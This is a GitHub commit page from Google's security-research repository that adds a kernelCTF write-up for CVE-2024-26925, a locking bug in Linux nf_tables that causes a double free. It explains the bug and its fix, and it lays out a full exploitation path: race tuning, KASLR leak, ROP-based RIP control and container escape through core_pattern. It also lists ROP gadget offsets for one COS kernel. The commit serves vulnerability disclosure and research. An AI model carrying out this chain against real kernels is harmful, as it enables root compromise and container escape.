Add kernelCTF CVE-2024-26925_lts_cos (#106)

* Update CVE-2024-26925_lts_cos * Use softlink to merge all files * Update exploit.md * Update vulnerability.md
google · Jul 3, 2024 · 5c8c44e · 5c8c44e
1 parent fa6e35b
commit 5c8c44e
Show file tree

Hide file tree

Showing 21 changed files with 1,410 additions and 0 deletions.
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/exploit.md
@@ -0,0 +1,178 @@
+# Exploit details
+The vulnerability is a locking issue that resides in __nf_tables_abort() during the call to nf_tables_module_autoload(), 
+which releases the mutex lock and causes GC sequence protection to be bypassed. To exploit this vulnerability, 
+we must find a reliable way to race the abort thread and the set GC thread. By doing so, we can turn this locking 
+issue into a double-free primitive.
+
+## Module Autoload
+
+Since nftables object types (e.g., `nft_tunnel_obj_type`, `nft_quota_obj_type`, etc.) might reside in external kernel modules, 
+encountering a type currently not present in nftables will first add the typename to `nft_net->module_list` and attempt 
+to load the corresponding type's kernel module during the abort phase via `nf_tables_module_autoload()`. 
+
+Therefore, `nf_tables_module_autoload()` can be triggered by requesting a non-existent object type in a batch commit.
+
+```c
+static const struct nft_object_type *
+nft_obj_type_get(struct net *net, u32 objtype, u8 family)
+{
+    const struct nft_object_type *type;
+
+    rcu_read_lock();
+    type = __nft_obj_type_get(objtype, family);
+
+    // ...
+
+#ifdef CONFIG_MODULES
+    if (type == NULL) { // if type does not exist
+        if (nft_request_module(net, "nft-obj-%u", objtype) == -EAGAIN)
+            return ERR_PTR(-EAGAIN);
+    }
+#endif
+    return ERR_PTR(-ENOENT);
+}
+```
+
+```c
+__printf(2, 3) int nft_request_module(struct net *net, const char *fmt, ...)
+{
+    // ...
+
+    nft_net = nft_pernet(net);
+    list_for_each_entry(req, &nft_net->module_list, list) {
+        if (!strcmp(req->module, module_name)) {
+            if (req->done)
+                return 0;
+
+            /* A request to load this module already exists. */
+            return -EAGAIN;
+        }
+    }
+
+    req = kmalloc(sizeof(*req), GFP_KERNEL);
+    if (!req)
+        return -ENOMEM;
+
+    req->done = false;
+    strscpy(req->module, module_name, MODULE_NAME_LEN);
+    list_add_tail(&req->list, &nft_net->module_list); // add to request list
+
+    return -EAGAIN;
+}
+```
+
+## Race to Double Free
+
+With this vulnerability, we can make the set GC procedure record the GC sequence and acquire the mutex lock 
+within the call to  `__nf_tables_abort()` to bypass the GC sequence check. The goal is to free 
+the same set element twice during the handling of a batch commit.
+
+The race process is as follows:
+- New `setelem A`
+- New unknown type object (trigger `__nf_tables_abort()`)
+    - `nft_rhash_gc()` records expired `setelem A`
+    - `setelem A `unlinks from the set, `kfree`'d
+    - module autoload releases mutex lock
+    - `nft_trans_gc_work_done()` acquires mutex lock, bypassing GC sequence check
+    - `setelem A` `kfree`'d second time
+
+To increase the success rate of the race (and capture the kernelctf slot), we need to enlarge the two time windows in the race process:
+1. For the GC thread, we want its timer to wake up and record `setelem A` after `__nf_tables_abort()` starts but before `setelem A` is removed from the set. Otherwise, `setelem A` cannot be recorded.
+2. The module loading time should be long enough to ensure that `nft_trans_gc_work_done()` can acquire the mutex lock.
+
+To delay the removal of `setelem A` in `__nf_tables_abort()` from the set, we can add many operations after the creation of 
+`setelem A` in the batch commit. Since `__nf_tables_abort()` processes batch commit operations in reverse order, 
+these operations will be processed before removing `setelem A`. 
+
+In order to maximize this delay, we pre-allocate multiple anonymous sets (`NFT_SET_MAP`) with many elements, 
+reference them through `dynset` expressions, and delete these expressions via `NFT_MSG_DELRULE` at the end of the batch commit. 
+This ensures that `nft_map_activate()` is called to traverse all set elements during the abort process, delaying the removal of `setelem A`.
+
+For the module autoload part, since all types waiting for autoload will not be removed from `nft_net->module_list` 
+even after autoloading finishes, and `nf_tables_module_autoload()` will always try to load the type in the list without 
+checking if `req->done` is set, each autoload trigger will reload all previously autoloaded types.
+
+```c
+static void nf_tables_module_autoload(struct net *net)
+{
+    struct nftables_pernet *nft_net = nft_pernet(net);
+    struct nft_module_request *req, *next;
+    LIST_HEAD(module_list);
+
+    list_splice_init(&nft_net->module_list, &module_list);
+    mutex_unlock(&nft_net->commit_mutex);
+    list_for_each_entry_safe(req, next, &module_list, list) {
+        request_module("%s", req->module);
+        req->done = true;
+    }
+    mutex_lock(&nft_net->commit_mutex);
+    list_splice(&module_list, &nft_net->module_list);
+}
+```
+
+Therefore, we only need to attempt autoloading non-existent and non-repeating object types N times before 
+the new `setelem A` operation. Finally, triggering autoload with a non-existent object type after the new `setelem A` will trigger `request_module()` N+1 times.
+
+With the above adjustments, the batch commit used in the exploit includes the following operations:
+- New unknown type object (1)
+- ...
+- New unknown type object (N)
+- New `setelem A` (kmalloc-cg-256)
+- Delete all dynset expressions (deactivate all pre-allocated setelems)
+- New unknown type object (N+1)
+
+By extending the two race windows mentioned above, we should be able to reliably trigger the race condition and cause a double free, right? 
+
+Actually, **no**. We were surprised to find that even if we extend the processing time of pre-allocated set elements to the scale of seconds, 
+`nft_rhash_gc()` still doesn't race with `__nf_tables_abort()`.
+
+We later found that for some reason, `nft_rhash_gc()` will not be scheduled by `system_power_efficient_wq` during high CPU usage.
+
+```c
+static void nft_rhash_gc_init(const struct nft_set *set)
+{
+    struct nft_rhash *priv = nft_set_priv(set);
+
+    queue_delayed_work(system_power_efficient_wq, &priv->gc_work,
+        nft_set_gc_interval(set));
+}
+```
+
+In our case, re-activating all pre-allocated set elements 
+in `__nf_tables_abort()` will cause high CPU usage, thus `nft_rhash_gc()` will not be scheduled.
+To solve this problem, we switch the main thread to a different CPU using `set_cpu()` before the race. 
+Additionally, this provides a bonus: the slab allocator will not detect our double free because the same object is freed by two different CPUs.
+
+Once we can reliably trigger the race to cause double free, the free list in kmalloc-cg-256 will be `[A, A]`.
+
+## KASLR Bypass
+
+After obtaining the double free primitive, I used the same exploit method as in [CVE-2023-4004](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md). 
+Since there are now two elements A that have been double freed in the kmalloc-cg-256 free list, we can overlap `nft_table`'s `table->udata` with the `nft_object` object to leak `obj->ops` (address of `nft_ct_expect_obj_ops`).
+- New `table A` (with `NFTA_TABLE_USERDATA` data length equals 256)
+- New `object B` (`nft_ct_expect_obj`)
+- Dump `table A` (leaking `object B` structure)
+
+After leaking the kernel address, restore the free list state to `[A, B, A]` to facilitate subsequent operations.
+
+## Control RIP
+
+At this stage, we again overlap `nft_table`'s `table->udata` with the `nft_object` object to control the `obj->ops` function table pointer, thereby controlling the RIP.
+
+We will first leak kernel heap address which we used to store fake `obj->ops` function pointer table.
+- New `table A` (with `NFTA_TABLE_USERDATA` data length equals 256)
+- New `table B` (with `NFTA_TABLE_USERDATA` data length equals 256)
+- New `object C` (providing `NFTA_OBJ_USERDATA`, later used for faking `obj->ops`)
+- Dump `table A` (leaking `obj->udata`)
+
+Then reallocate table to modify the overlapped `object C` and call to `obj->ops->dump` to trigger ROP
+- Delete `table A`
+- New `table D` (setting `obj->ops` to `obj->udata`, setting ROP chain)
+- Dump `object C` (triggering ROP chain)
+
+## Container Escape
+
+We reuse the the exploit technique from [CVE-2023-4622](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4622_lts/docs/exploit.md#achieve-container-escape). 
+
+By rewriting `core_pattern` to `|/proc/%P/fd/<fd number>` and placing the binary in the corresponding fd via `memfd_create()`, 
+we can execute any binary outside the container when a coredump is triggered.
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/docs/vulnerability.md
@@ -0,0 +1,174 @@
+# Vulnerability Details
+A locking issue was found in the Linux kernel netfilter/nftables subsystem (`net/netfilter/nf_tables_api.c`), 
+it leads to breaking the assumption in set asynchronous GC, which can be use to cause double free.
+
+The asynchronous set GC (`nft_rhash_gc` for example) does not acquire commit lock while doing the work, 
+instead, it use GC sequence (`gc_seq`) mechanism to protect it from racing with the transaction.
+At the begin of `nft_rhash_gc` It will save the current GC sequence and allocate a GC transaction 
+to store information, then traverse the set to record all expired set element into GC transaction, 
+and finally call `nft_trans_gc_queue_async_done(gc)`.
+
+```c
+static void nft_rhash_gc(struct work_struct *work)
+{
+	// ...
+	gc_seq = READ_ONCE(nft_net->gc_seq); // save GC sequence
+
+	if (nft_set_gc_is_pending(set))
+		goto done;
+
+	gc = nft_trans_gc_alloc(set, gc_seq, GFP_KERNEL);
+	if (!gc)
+		goto done;
+
+	// ...
+	while ((he = rhashtable_walk_next(&hti))) {
+		// check if setelem expired
+		if (!nft_set_elem_expired(&he->ext))
+			continue;
+
+		// ...
+		nft_trans_gc_elem_add(gc, he);
+	}
+
+	if (gc)
+		nft_trans_gc_queue_async_done(gc);
+
+	// ...
+}
+```
+
+The function `nft_trans_gc_queue_async_done(gc)` saves the GC transaction into a global list and eventually schedules 
+`nft_trans_gc_work()` to run. `nft_trans_gc_work()` then retrieves the gc transaction and calls `nft_trans_gc_work_done()` 
+to perform check on GC sequence.
+
+```c
+static void nft_trans_gc_work(struct work_struct *work)
+{
+	// ...
+	list_for_each_entry_safe(trans, next, &trans_gc_list, list) {
+		list_del(&trans->list);
+		if (!nft_trans_gc_work_done(trans)) { // do the check here
+			nft_trans_gc_destroy(trans);
+			continue;
+		}
+		call_rcu(&trans->rcu, nft_trans_gc_trans_free);
+	}
+}
+```
+
+The function `nft_trans_gc_work_done()` will first acquire the commit lock, and compare the saved GC sequence 
+with current GC sequence, if they are different, means we race with the transaction, since all critical section 
+which modify the control plane are surrounded by `nft_gc_seq_begin()` and `nft_gc_seq_end()` which both increase 
+the current GC sequence (`nft_net->gc_seq`), so if it's the case, it means the state of the set may have been changed,
+and the function will return false to stop processing this GC transaction.
+
+
+```c
+static bool nft_trans_gc_work_done(struct nft_trans_gc *trans)
+{
+	struct nftables_pernet *nft_net;
+	struct nft_ctx ctx = {};
+
+	nft_net = nft_pernet(trans->net);
+
+	mutex_lock(&nft_net->commit_mutex); // acquire global mutex
+
+	/* Check for race with transaction, otherwise this batch refers to
+	 * stale objects that might not be there anymore. Skip transaction if
+	 * set has been destroyed from control plane transaction in case gc
+	 * worker loses race.
+	 */
+	if (READ_ONCE(nft_net->gc_seq) != trans->seq || trans->set->dead) { // check gc sequence to prevent race
+		mutex_unlock(&nft_net->commit_mutex);
+		return false;
+	}
+
+	ctx.net = trans->net;
+	ctx.table = trans->set->table;
+
+	nft_trans_gc_setelem_remove(&ctx, trans);
+	mutex_unlock(&nft_net->commit_mutex);
+
+	return true;
+}
+```
+
+However, the GC sequence mechanism only works under the assumption that the commit lock should not be released
+during the critical section between `nft_gc_seq_begin()` and `nft_gc_seq_end()`. Otherwise, a GC thread
+may record the expired object and obtain the released commit lock within the same `gc_seq`, thus bypassing the GC sequence check.
+
+`__nf_tables_abort()` is the one does it wrong, the function is surrounded by `nft_gc_seq_begin()` and `nft_gc_seq_end()`, 
+if it received the action `NFNL_ABORT_AUTOLOAD`, `nf_tables_module_autoload()` will be called to process the module requests,
+however, the function release the commit lock before processing the module request, which breaks the assumption of GC
+sequence and leads to double free.
+
+```c
+static int nf_tables_abort(struct net *net, struct sk_buff *skb,
+			   enum nfnl_abort_action action)
+{
+	gc_seq = nft_gc_seq_begin(nft_net);   // gc_seq++
+	ret = __nf_tables_abort(net, action);
+	nft_gc_seq_end(nft_net, gc_seq);      // gc_seq++
+	mutex_unlock(&nft_net->commit_mutex);
+
+	return ret;
+}
+
+static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+{
+	// ...
+
+	if (action == NFNL_ABORT_AUTOLOAD)
+		nf_tables_module_autoload(net); // load modules
+	else
+		nf_tables_module_autoload_cleanup(net);
+
+	return 0;
+}
+
+static void nf_tables_module_autoload(struct net *net)
+{
+	struct nftables_pernet *nft_net = nft_pernet(net);
+	struct nft_module_request *req, *next;
+	LIST_HEAD(module_list);
+
+	list_splice_init(&nft_net->module_list, &module_list);
+	mutex_unlock(&nft_net->commit_mutex); // BUG: release mutex lock inside GC sequence critical section
+	list_for_each_entry_safe(req, next, &module_list, list) {
+		request_module("%s", req->module);
+		req->done = true;
+	}
+	mutex_lock(&nft_net->commit_mutex);
+	list_splice(&module_list, &nft_net->module_list);
+}
+```
+
+## Requirements to trigger the vulnerability
+- Capabilities: `CAP_NET_ADMIN` capability is required.
+- Kernel configuration: `CONFIG_NETFILTER`, `CONFIG_NF_TABLES`
+- User namespace: As this vulnerability requires `CAP_NET_ADMIN`, which is not usually given to the normal user, we used the unprivileged user namespace to achieve this capability.
+
+## Commit which introduced the vulnerability
+- The vulnerability was introduced in Linux v6.5, with commit [720344340fb9be2765bbaab7b292ece0a4570eae](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=720344340fb9be2765bbaab7b292ece0a4570eae)
+- An incomplete fix to new GC transaction API introduced this vulnerability.
+
+## Commit which fixed the vulnerability
+- The vulnerability was fixed in Linux v6.9-rc3, with commit [0d459e2ffb541841714839e8228b845458ed3b27](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0d459e2ffb541841714839e8228b845458ed3b27)
+- The commit move the call to  `nf_tables_module_autoload()` after `nft_gc_seq_end()` to fix the check.
+
+## Affected kernel versions
+- Linux version v6.5 ~ v6.9-rc2 affects to this vulnerability
+- For LTS versions
+	- v5.15.134 ~
+	- v6.1.56 ~
+
+## Affected component, subsystem
+- netfilter/nf_tables
+
+## Cause (UAF, BoF, race condition, double free, refcount overflow, etc)
+- Locking issue leads to double free
+
+## Which syscalls or syscall parameters are needed to be blocked to prevent triggering the vulnerability? (If there is any easy way to block it.)
+- Disable syscalls for netfilter (specifically, nftables) subsystem (ex. `socket`, `sendmsg` with netlink socket) to prevent this vulnerability.
+- Disable syscalls for unprivileged user namespace (ex. `clone`, `unshare`) can reduce the attack surface since the netfilter subsystem requires `CAP_NET_ADMIN` to use.
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/Makefile b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/Makefile
@@ -0,0 +1 @@
+../lts-6.1.81/Makefile
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/deps.tar.gz b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/deps.tar.gz
@@ -0,0 +1 @@
+../lts-6.1.81/deps.tar.gz
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exp.c b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exp.c
@@ -0,0 +1 @@
+../lts-6.1.81/exp.c
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exploit b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/exploit
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/params.h b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/params.h
@@ -0,0 +1,16 @@
+#include <stddef.h>
+#include <unistd.h>
+size_t nft_ct_expect_obj_type = 0x271c120;
+size_t nft_ct_expect_obj_ops = 0x1acba40;
+size_t core_pattern = 0x259e7a0;
+size_t rcu_read_unlock = 0x120127b; // Symbol '__rcu_read_unlock' not found. (use ret here)
+size_t copy_from_user = 0x776520;
+size_t delay_loop = 0x7d6c70;
+
+size_t pop_rdi = 0x81910;
+size_t pop_rsi = 0x1a9d38;
+size_t pop_rdx = 0x1a9725;
+size_t pop_3 = 0x68158; // pop r12 ; pop rbp ; pop rbx ; ret
+size_t pop_rsp_ret = 0x106deb;
+size_t add_rsp_0x50 = 0x190786; // add rsp, 0x50 ; jmp 0xffffffff82203980 (ret)
+size_t push_rsi_jmp_deref_rsi_0x39 = 0x8a2d27; // push rsi ; jmp qword ptr [rsi + 0x39]
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/root.c b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/root.c
@@ -0,0 +1 @@
+../lts-6.1.81/root.c
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/run.sh b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/run.sh
@@ -0,0 +1 @@
+../lts-6.1.81/run.sh
diff --git a/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/tools.h b/pocs/linux/kernelctf/CVE-2024-26925_lts_cos/exploit/cos-105-17412.294.36/tools.h
@@ -0,0 +1 @@
+../lts-6.1.81/tools.h